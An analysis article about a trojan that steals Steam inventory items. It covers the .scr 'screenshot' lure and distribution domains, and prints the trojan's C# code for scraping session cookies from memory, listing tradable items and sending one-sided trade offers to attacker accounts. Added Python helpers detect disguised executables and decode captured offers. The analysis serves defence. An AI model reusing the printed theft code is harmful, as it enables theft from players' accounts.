Steam Item-Stealing Trojan



Although this trojan has been known about for a long time, it only became truly widespread at the end of November.
What makes it interesting is that instead of the usual theft of logins and passwords, which is fairly easy to protect against, it steals items directly from the Steam inventory.

Valve has been aware of the problem for a long time but has not taken any particular action for several months, although the current wave could be stopped without difficulty by small changes to the Steam client.

A Steam inventory contains items from several popular Valve games, some of which can cost a rather impressive amount (by the standards of colored pixels). It also stores items related to Steam itself (gift copies of games, profile backgrounds, emoticons, etc.).

Infection


Infection proceeds as follows. An unsuspecting user receives a message containing a link to what is supposedly a screenshot of an inventory, together with an offer to trade items. Clicking the link automatically starts downloading a .scr file whose icon looks like an image thumbnail. Given that Windows hides file extensions by default, and that even when they are shown, .scr can easily be taken for “screenshot”, everything looks quite believable.



When the file is launched, the trojan unpacks an image from its resources and opens it (the picture really is a screenshot of an inventory or of some item). Some of the variants also write themselves to autorun.
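As an added illustration (not code from the article or from the trojan), here is a small Python check that classifies a downloaded “screenshot” by its real file header rather than by its icon or its visible name, which is exactly what the lure above relies on; the file names and byte samples are constructed.

```python
import os

PE_MAGIC = b"MZ"
IMAGE_MAGICS = {b"\x89PNG\r\n\x1a\n": "png", b"\xff\xd8\xff": "jpeg", b"GIF8": "gif"}
IMAGE_EXTS = {".png", ".jpg", ".jpeg", ".gif"}
# Extensions Windows runs as a PE image on double-click; .scr is the one the lure uses.
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif"}


def classify_download(filename, head):
    """Verdict from the real file header, not from the icon or the visible name."""
    stem, ext = os.path.splitext(filename)
    ext = ext.lower()
    if head.startswith(PE_MAGIC):
        if ext in EXECUTABLE_EXTS:
            # "shot.scr" is shown as "shot" when extensions are hidden,
            # and "shot.png.scr" is shown as "shot.png".
            hidden_image_ext = os.path.splitext(stem)[1].lower() in IMAGE_EXTS
            return "pe-double-extension" if hidden_image_ext else "pe-executable"
        return "pe-with-image-extension" if ext in IMAGE_EXTS else "pe-odd-extension"
    for magic, kind in IMAGE_MAGICS.items():
        if head.startswith(magic):
            return "image-" + kind
    return "unknown"


def is_fake_screenshot(filename, head):
    """True when a file offered as a screenshot is actually a PE, whatever it is called."""
    return classify_download(filename, head).startswith("pe-")


# Constructed samples: a PE with an image icon still begins with the MZ header.
SAMPLES = {
    "inventory.scr": b"MZ\x90\x00" + b"\x00" * 60,
    "inventory.png.scr": b"MZ\x90\x00" + b"\x00" * 60,
    "inventory.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 60,
}

if __name__ == "__main__":
    for name, head in SAMPLES.items():
        print(name, "->", classify_download(name, head), "fake:", is_fake_screenshot(name, head))
```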



In parallel, the trojan extracts cookies from the Steam client’s memory, makes a request to steamcommunity.com to obtain the session identifier, searches the inventory for suitable items, and sends them via a trade offer (“Trade Request”) to accounts prepared by the attackers.

By the way, while writing this article I came across another version of the trojan (evidently based on public sources) that was written somewhat differently and had additional functions, for example sending messages through the friends list.

Incidentally, the original name of the sample I collected was “Maksim Steam Offer.exe”, as .NET Reflector kindly told me, and the identifier of the profile the stolen items go to is 76561198009197365. The domain from which the trojan was spread (and is still being distributed at the time of writing) is “puush-me.com” (for those who decide to play detective, visit it from a virtual machine). And yes, it is not obfuscated.

A few of the domains I managed to collect:

take-screen.org
fastscreen.org
my-screenshot.net
puush-me.com
picturesfast.net
screen-url.com

Remarkably, most of them are registered with Russian registrars.

Digging into the source


The trojan itself is written in C#, which is quite unusual for this kind of software. The sources I downloaded from the Internet consisted of several files: WinApis.cs, containing several methods for working with the WinAPI; Http.cs, containing methods that emulate requests from the Steam client (down to the last header); and Program.cs, where all the action takes place.

Interestingly, the total amount of code is only about 500 lines.

Both variants of the trojan pull the cookies out of the client’s memory with the following regular expression:

MatchCollection matchs = new Regex("7656119[0-9]{10}%7c%7c[A-F0-9]{40}", RegexOptions.IgnoreCase).Matches(preparedIDs);

Then, using the cookies obtained, a request is sent to steamcommunity.com to get the session identifier, for which there is a separate (and rather large) method in Http.cs.

Having received the identifier, the trojan uses the steamcommunity API to fetch the contents of the inventory:

private static List<string[]> GetItems(string steamID, string appID)
{
    List<string[]> items = new List<string[]>();
    while (true)
    {
        // Inventory endpoint of the Steam community site (context id 2) for the given game
        string link = "profiles/" + steamID + "/inventory/json/" + appID + "/2/";
        string json = Http.SteamWebRequest(cookiesContainer, link, null, "");
        try
        {
            JObject inventory = JObject.Parse(json);
            if (((inventory.SelectToken("success") != null) && ((bool)inventory.SelectToken("success"))) &&
               (inventory.SelectToken("rgDescriptions")).First != null)
            {
                // rgDescriptions holds per-class metadata (name, type, tradability);
                // rgInventory lists the item instances actually owned
                IJEnumerable<JToken> descriptionsBase = inventory.SelectToken("rgDescriptions").Values();
                foreach (JToken eachItem in inventory.SelectToken("rgInventory").Values())
                {
                    JToken infoAbout = descriptionsBase.Where(each => each["classid"].ToString() == eachItem["classid"].ToString()).First();
                    // Only tradable items are collected
                    if (infoAbout["tradable"].ToString() == "1")
                    {
                        string[] item = new string[] { appID, eachItem["amount"].ToString(), eachItem["id"].ToString(), infoAbout["market_name"].ToString(), infoAbout["type"].ToString().ToLower() };
                        if (!items.Contains(item)) { items.Add(item); }
                    }
                }
            }
            break;
        }
        catch { return null; }
    }
    return items;
}

Filters them according to the specified criteria:

listed = FilterByRarity(listed, "common,");

private static List<string[]> FilterByRarity(List<string[]> input, string filter)
{
    // Comma-separated list of words to look for in the item's type field (index 4)
    string[] filters = filter.Split(',');
    List<string[]> output = new List<string[]>();
    for (int i = 0; i < input.Count; i++)
    {
        for (int x = 0; x < filters.Length; x++)
        {
            string[] types = input[i][4].Split(' ');
            for (int c = 0; c < types.Length; c++)
            {
                if (types[c] == filters[x] && !output.Contains(input[i]))
                {
                    output.Add(input[i]);
                    break;
                }
            }
        }
    }
    return output;
}

And the suitable items (often quite expensive ones) are sent to the pre-prepared accounts:

private static string sentItems(string sessionID, string items, string[] Offer)
{
    // Offer[0] is the partner's account id, Offer[1] the partner id used in the referer,
    // Offer[2] the trade offer access token. json_tradeoffer is URL-encoded JSON in which
    // "me" carries the victim's assets and "them" is empty, i.e. a one-sided offer.
    return Http.SteamWebRequest(cookiesContainer,
         "tradeoffer/new/send",
         "sessionid=" + sessionID +
         "&partner=" + Offer[0] +
         "&tradeoffermessage=&json_tradeoffer=%7B%22newversion%22%3Atrue%2C%22version%22%3A2%2C%22me%22%3A%7B%22assets%22%3A%5B" + items +
         "%5D%2C%22currency%22%3A%5B%5D%2C%22ready%22%3Afalse%7D%2C%22them%22%3A%7B%22assets%22%3A%5B%5D%2C%22currency%22%3A%5B%5D%2C%22ready%22%3Afalse%7D%7D&trade_offer_create_params=%7B%22trade_offer_access_token%22%3A%22" + Offer[2] + "%22%7D",
         "tradeoffer/new/?partner=" + Offer[1] + "&token=" + Offer[2]);
}
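For incident response, here is an added Python helper (not from the article or from the trojan) that decodes a captured tradeoffer/new/send request body of the shape shown above into the partner, the access token and the list of assets handed over, and flags one-sided offers; the sample body and all ids in it are constructed placeholders.

```python
import json
from urllib.parse import parse_qs

# Constructed sample of a tradeoffer/new/send POST body with the same layout
# as the one built above. Partner id, asset ids, session id and token are
# placeholders, not values from the article.
SAMPLE_BODY = (
    "sessionid=SESSIONPLACEHOLDER&partner=111111111&tradeoffermessage="
    "&json_tradeoffer=%7B%22newversion%22%3Atrue%2C%22version%22%3A2%2C"
    "%22me%22%3A%7B%22assets%22%3A%5B"
    "%7B%22appid%22%3A730%2C%22contextid%22%3A%222%22%2C%22amount%22%3A1%2C%22assetid%22%3A%22100001%22%7D%2C"
    "%7B%22appid%22%3A570%2C%22contextid%22%3A%222%22%2C%22amount%22%3A1%2C%22assetid%22%3A%22100002%22%7D"
    "%5D%2C%22currency%22%3A%5B%5D%2C%22ready%22%3Afalse%7D%2C"
    "%22them%22%3A%7B%22assets%22%3A%5B%5D%2C%22currency%22%3A%5B%5D%2C%22ready%22%3Afalse%7D%7D"
    "&trade_offer_create_params=%7B%22trade_offer_access_token%22%3A%22TOKENPLACEHOLDER%22%7D"
)


def decode_trade_offer(body):
    """Pull the security-relevant fields out of a captured trade offer request body."""
    fields = parse_qs(body, keep_blank_values=True)  # also percent-decodes the values
    offer = json.loads(fields["json_tradeoffer"][0])
    params = json.loads(fields.get("trade_offer_create_params", ["{}"])[0])
    given = offer["me"]["assets"]
    received = offer["them"]["assets"]
    return {
        "partner": fields["partner"][0],
        "access_token": params.get("trade_offer_access_token"),
        "given": [(a["appid"], a["contextid"], a["assetid"], a["amount"]) for a in given],
        "received_count": len(received),
        # Handing over items while asking for nothing back is the pattern the
        # trojan produces; a legitimate trade normally has both sides filled in.
        "one_sided_giveaway": bool(given) and not received,
    }


if __name__ == "__main__":
    print(json.dumps(decode_trade_offer(SAMPLE_BODY), indent=2))
```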

A few precautions: use Linux, do not open links sent by strangers, and use an antivirus (they detect it perfectly well).
